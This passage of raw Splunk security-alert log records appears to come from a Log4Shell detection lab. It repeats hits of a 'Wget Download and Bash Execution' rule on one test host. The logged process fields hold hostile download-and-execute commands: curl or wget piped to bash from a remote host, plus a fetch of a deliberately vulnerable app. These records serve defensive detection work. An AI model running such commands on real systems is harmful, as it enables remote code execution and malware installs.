the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639761, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
